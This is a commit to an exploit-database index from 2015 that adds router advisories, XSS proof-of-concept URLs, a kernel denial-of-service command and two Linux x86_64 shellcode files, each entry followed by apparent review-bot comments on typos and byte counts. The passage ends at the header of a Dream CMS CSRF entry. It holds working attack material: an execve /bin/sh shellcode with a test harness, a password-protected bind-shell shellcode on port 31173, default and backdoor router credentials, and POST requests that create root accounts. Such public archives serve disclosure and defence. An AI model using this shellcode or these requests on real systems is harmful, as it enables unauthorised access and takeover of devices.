DB: 2015-10-16

17 new exploits
Offensive Security 2015-10-16 05:02:10 +00:00
parent 01940201cb
commit aa57287847
18 changed files with 1243 additions and 0 deletions

@ -34452,6 +34452,7 @@ id,file,description,date,author,platform,type,port
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux x86_64 - /bin/sh",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
@ -34727,10 +34728,26 @@ id,file,description,date,author,platform,type,port
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0
38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross Site Scripting Vulnerability",2013-03-29,"Malte Batram",jsp,webapps,0
38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure Vulnerability",2013-04-13,MustLive,multiple,webapps,0
38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0
38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0
38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux x86_64 Bindshell with Password (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
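Review bot: two description strings in the new rows carry typos that will surface in every search of the index: `Crush application` in row 38444 should read `Crash application`, and `Mutiple` in row 38465 should read `Multiple`. Rows 38452 and 38453 are also inserted after 38459 instead of in id order. Row 38469 states `92 bytes` while the shellcode file it points to says 94 bytes in its own `;Description:` line; the byte string in that file is 92 bytes long, so the file's description is the one to correct.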

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/59054/info
Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:
1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.
Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.
The following example request is available:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&action=Apply
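Review bot: the advisory lists three distinct issues (security bypass, CSRF, XSS) but the single example request only exercises the reflected XSS in the `submit_button` parameter of `/apply.cgi`; the bypass and CSRF issues have no reproduction detail, so a reader cannot tell which "system and other configuration files" the text claims are exposed. The entry should at least say which of the three issues the request demonstrates and point to the BID for the rest. The one concrete datum for defenders, firmware 1.0.12.128947 as the only version confirmed affected, should stay verbatim.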

@ -0,0 +1,218 @@
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]
**Vulnerability Details**
* 1. Default, weak passwords for http and ftp services *
a. *HTTP accounts*
- guest/guest
- user/user
- guest/XXXXairocon
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>
*XXXX -> last four digits of MAC address *
b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>
2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>
This user is not shown / visible in the user list when logged in as guest
(privileged user).
3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.
It is possible to silently execute HTTP requests if the user is logged in.
4. *Weak RBAC controls *
5a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts. *
In netis RealTek wireless router ADSL modem, there are three users:
guest:guest -> priv 2 is super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:XXXXairocon -> privileged backdoor login
*Normally: *
- user can create new account with restricted user privs only.
- user can change its password and only other non-root users.
- user can delete any other non-root users.
However, the application does not enforce strict rbac and it is possible
for a non-root user to create a new user with root privileges.
This is done as follows:
1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
Submit request
3. When the new root user is created successfully, it does not show up in
user list
4. Confirm via logging in as new root, and / or configured accounts in
configuration file (config.img)
This is the POST request to create a new user:
*Create user http request*:
POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
root privileged account.
*Note2*: In some cases, application does not create root priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.
*Delete user http request:*
A non-root/non-admin user can delete any configured user(s) including
privileged users (guest).
POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
In case (non-root) user is deleting a root login (guest, priv 2), action
status can be confirmed by checking the configuration In case (non-root)
user is deleting a user login (priv 0), action status can be confirmed by
checking the user list.
5b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.
However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:
http://<IP>/fw-macfilter.htm
Other functions may also be accessible in this manner.
6. *Sensitive information not secured from low privileged users *
A non-root / non-admin privileged user has access to download the
configuration file - config.img.
This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.
7. *Sensitive information accessible in clear-text*
Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen
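Review bot: the section numbering is broken: `4. *Weak RBAC controls *` is immediately followed by `5a)` and `5b)` with no section 5, so it is unclear whether the RBAC findings are item 4 or item 5. The delete-user request body is cut off at `submit.htm%` while its header declares `Content-Length: 131`, so the request as printed cannot be compared against the create-user request; restore the full body or mark it as truncated. Smaller points: the `guest/XXXXairocon` backdoor login is listed under item 1 as a default password and again under item 2, and `cen censored` in item 7 should read `censored`. It is worth stating explicitly for defenders that item 6 (any low-privileged user can download `config.img`) is what turns the weak-password findings into privileged access, since the text says that file carries the clear-text credentials the earlier items enumerate.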

@ -0,0 +1,219 @@
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]
**Vulnerability Details**
*1. Default, weak passwords for http and ftp services *
a. *HTTP accounts*
- admin/password
- user/user
- guest/XXXXairocon
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>
*XXXX -> last four digits of MAC address *
b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>
2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>
This user is not shown / visible in the user list when logged in as admin
(privileged user).
3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.
It is possible to silently execute HTTP requests if the user is logged in.
4. *Weak RBAC controls *
5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts. *
There are three users:
admin:password -> priv 2 is super user account with full functional access
(admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:XXXXairocon -> privileged backdoor login
*Normally: *
- user can create new account with restricted user privs only.
- user can change its password and only other non-admin users.
- user can delete any other non-admin users.
However, the application does not enforce strict rbac and it is possible
for a non-admin user to create a new account with admin privileges.
This is done as follows:
1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
user list
4. Confirm via logging in as new admin, and / or configured accounts in
configuration file (config.img)
This is the POST request to create a new user:
*Create user http request*:
POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
higher privileged account.
*Note2*: In some cases, application does not create admin priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.
*Delete user http request:*
A non-admin user can delete any configured user(s) including privileged
users (admin).
POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
In case (non-admin) user is deleting the admin login (priv 2), action
status can be confirmed by checking the configuration.
In case (non-admin) user is deleting another user login (priv 0), action
status can be confirmed by checking the user list.
5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.
However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:
http://<IP>/fw-macfilter.htm
Other functions may also be accessible in this manner.
6. *Sensitive information not secured from low privileged users *
A non-admin privileged user has access to download the configuration file
- config.img.
This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.
7. *Sensitive information accessible in clear-text*
Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen
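Review bot: the `# Vendor Homepage:` header is split across two lines (the `[` on one line, the URL on the next), which will break any tooling that parses the header block; join them. The body otherwise repeats the netis advisory almost verbatim and inherits its defects: no section 5 between `4.` and `5a)`, the delete-user body truncated at `submit.htm%` against a declared `Content-Length: 131`, and `cen censored` in item 7. Since both advisories show identical `USERNAME_PASSWORD` and `FTP_SERVER` config chains and the same `guest/XXXXairocon` backdoor account, the entry should say that the two devices appear to share a firmware base; that is the most useful fact for anyone triaging similar CPE.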

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hero 3.791 is vulnerable; other versions may also be affected.
http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
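Review bot: the second paragraph is SecurityFocus boilerplate that does not fit the finding: a reflected XSS in the `username` parameter of `/users/login` does not by itself let anyone `exploit latent vulnerabilities in the underlying database`, and the phrase should be dropped rather than copied through. The payload (`%22%3E%3Cscript%3E...`) shows the injection point is inside a double-quoted attribute, which is worth stating in words, as is the fact that only version 3.791 was checked.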

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hero 3.791 is vulnerable; other versions may also be affected.
http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
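Review bot: the `error` value in the PoC URL is base64 (it decodes to the same `<script>alert(document.cookie);</script>` used in the login entry) and the text never says so; the description should state that the application base64-decodes `error` before rendering it, because that is the detail a defender needs to write a detection rule or a fix. The same inapplicable `underlying database` boilerplate as in 38461 is copied here too.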

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59030/info
jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write
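Review bot: the CSV row for this entry (38460) lists the platform as `jsp`, but the PoC targets `Jplayer.swf`, a Flash object, and the injected value is a JavaScript callback name (`jQuery=document.write`); the platform field looks wrong and the text does not explain what the `jQuery` parameter does. One sentence saying that the SWF calls back into the page through a caller-supplied function name, and that the fix is to validate that name rather than accept arbitrary JavaScript, would make the entry self-explanatory. No affected version is given.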

@ -0,0 +1,90 @@
# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)
AT&T VERSION (for smooth debug)
-------------------------------
.global _start
.text
_start:
# int execve(const char *filename, char *const argv[], char *const envp[]);
xor %rax, %rax
add $59, %rax # Linux 64b execve
xor %rdi, %rdi
push %rdi # '\0' for termination of string below
mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding)
push %rdi
lea (%rsp), %rdi
xor %rsi, %rsi # no shell arguments
xor %rdx, %rdx # no env vars
syscall
$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt
Disassembly of section .text:
4000d4: 48 31 c0 xor %rax,%rax
4000d7: 48 83 c0 3b add $0x3b,%rax
4000db: 48 31 ff xor %rdi,%rdi
4000de: 57 push %rdi
4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
4000e6: 2f 73 68
4000e9: 57 push %rdi
4000ea: 48 8d 3c 24 lea (%rsp),%rdi
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 31 d2 xor %rdx,%rdx
4000f4: 0f 05 syscall
INTEL VERSION
-------------
BITS 64
xor rax, rax
add rax, 59
xor rdi, rdi
push rdi
mov rdi, 0x68732F2f6e69622F
push rdi
lea rdi, [rsp]
xor rsi, rsi
xor rdx, rdx
syscall
$ nasm shellcode.a
SHELLCODE_TEST.C
----------------
int main(int argc, char **argv) {
int (*f)() = (int(*)()) argv[1];
return (*f)();
}
$ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"
STRING
------
$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05
$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"
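Review bot: `shellcode_test.c` reads `argv[1]` without checking `argc`, so running it with no argument dereferences a null pointer instead of printing a usage message; add `if (argc < 2) return 1;`. The build steps also rely on unstated file names: `nasm shellcode.a` assumes the Intel listing was saved as `shellcode.a` and yields the flat binary `shellcode` (nasm's default output when no format is given) that the later `xxd` and `cat` commands consume. Under the AT&T section the `$ ./shellcode_atnt` and `$ gdb -q ./shellcode_atnt` lines sit between the build command and its `objdump` output, which reads as if gdb produced the disassembly; reorder them and name the output files.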

@ -0,0 +1,121 @@
/*
;Title: bindshell with password in 92 bytes
;Author: David Velázquez a.k.a d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm
; ld -o bindshell bindshell.o
; ./bindshell
;SLAE64-1379
global _start
_start:
socket:
;int socket(int domain, int type, int protocol)2,1,0
xor esi,esi ;rsi=0
mul esi ;rdx,rax,rsi=0, rdx is 3rd argument
inc esi ;rsi=1, 2nd argument
push 2
pop rdi ;rdi=2,1st argument
add al, 41 ;socket syscall
syscall
push rax ;socket result
pop rdi ;rdi=sockfd
;struct sockaddr_in {
; sa_family_t sin_family; /* address family: AF_INET */
; in_port_t sin_port; /* port in network byte order */
; struct in_addr sin_addr; /* internet address */
;};
push 2 ;AF_INET
mov word [rsp + 2], 0xc579 ;port 31173
push rsp
pop rsi ;rsi=&sockaddr
bind:
;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
push rdx ;initialize with 0 to avoid SEGFAULT
push 16
pop rdx ;rdx=16 (sizeof sockaddr)
push 49 ;bind syscall
pop rax
syscall
listen:
;int listen(int sockfd, int backlog)
pop rsi
mov al, 50 ;listen syscall
syscall
accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
mov al, 43 ;accept syscall
syscall
;store client
push rax ;accept result(client)
pop rdi ;rdi=client
;don't to close parent to have a small shellcode
;in a loop is necessary to close the conection!!
password:
;ssize_t read(int fd, void *buf, size_t count)
push rsp ;1st argument
pop rsi ;2nd argument
xor eax, eax ;read syscall
syscall
cmp dword [rsp], '1234' ;"1234" like password
jne error ; if wrong password then crash program
;int dup2(int oldfd, int newfd)
push 3
pop rsi
dup2:
dec esi
mov al, 33 ;dup2 syscall applied to error,output and input
syscall
jne dup2
execve:
;int execve(const char *filename, char *const argv[],char *const envp[])
push rsi
pop rdx ;3rd argument
push rsi ;2nd argument
mov rbx, 0x68732f2f6e69622f ;1st argument /bin//sh
push rbx
push rsp
pop rdi
mov al, 59 ;execve
syscall
error:
;SEGFAULT
*/
#include<stdio.h>
#include<string.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char code[] = \
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
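Review bot: the byte count is inconsistent: the title says 92 bytes, the `;Description:` line says 94, and the `code[]` literal in the C harness contains 92 bytes, so the description should be corrected. In the harness, `main()` with no return type is implicit-int C89 and is rejected by current compilers in their default modes; make it `int main(void)`, and print the length with `%zu` since `strlen` returns `size_t`. The comment `;don't to close parent to have a small shellcode` is garbled; it appears to mean that the listening socket is deliberately left open to save bytes, which is also why the next line notes that a looping version would have to close the connection. Finally, `cmp dword [rsp], '1234'` compares only the first four bytes of whatever `read` returned, so the description's `4 bytes as password` should say exactly that.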

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/59055/info
The Linux kernel is prone to multiple local denial-of-service vulnerabilities.
Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition.
cd /sys/kernel/debug/tracing
echo 1234 | sudo tee -a set_ftrace_pid
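Review bot: the two-line PoC gives no indication of which of the `multiple` tracing issues it triggers or what the expected result is (oops, hang, or silent failure), and no kernel version appears in the file itself; the `<= 3.2.1` bound lives only in the CSV row. Add the version and the observed outcome so the entry is testable. For defenders the relevant facts are that the write goes to `set_ftrace_pid` under debugfs and, as the `sudo tee` shows, needs root, so this is a crash reachable by an already-privileged local user rather than an unprivileged one.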

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59053/info
Aibolit is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html
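Review bot: the PoC URL contains a stray space in `< time>` that should be `<time>`, and the entry never explains the placeholders; the disclosure is that scanner reports named `AI-BOLIT-REPORT-<date>-<time>.html` are left at the web root under a predictable name. No affected version is stated. For defenders it follows directly from the shown path that reports should be written outside the document root, or removed once reviewed.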

125
platforms/php/webapps/38446.html Executable file
@ -0,0 +1,125 @@
<!--
Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution
Vendor: Dream CMS
Product web page: http://www.dream-cms.kg
Affected version: 2.3.0
